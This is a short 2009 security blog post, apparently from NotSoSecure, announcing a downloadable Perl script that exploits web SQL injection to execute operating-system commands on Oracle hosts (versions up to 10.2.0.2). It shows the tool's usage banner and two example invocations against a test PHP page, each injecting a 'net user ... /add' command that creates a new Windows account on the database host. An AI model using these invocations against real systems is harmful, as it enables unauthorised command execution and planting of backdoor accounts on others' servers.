More On Oracle O.S command execution

May 1, 2009

I wrote a small perl script to automate this process. The script ‘ora_cmd_exec.pl’ exploits web based SQL Injections and execute O.S commands on the Oracle host.

./ora_cmd_exec.pl
———————————————————————–
Oracle command execution via web apps
sid-at-NotSoSecure // www.notsosecure.com
suported versions <=10.2.0.2, all platforms ------------------------------------------------------------------------ Usage: ora_cmd_exec.pl

EXAMPLE: ./ora_cmd_exec.pl “http://192.168.172.129:81/ora3.php?name=s’ ” “net user notsosecure n0tsos3cur3 /add”
EXAMPLE: ./ora_cmd_exec.pl “http://192.168.172.129:81/ora3.php?id=100 ” “net user notsosecure n0tsos3cur3 /add”
————————————————————————

Download Here

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Trackback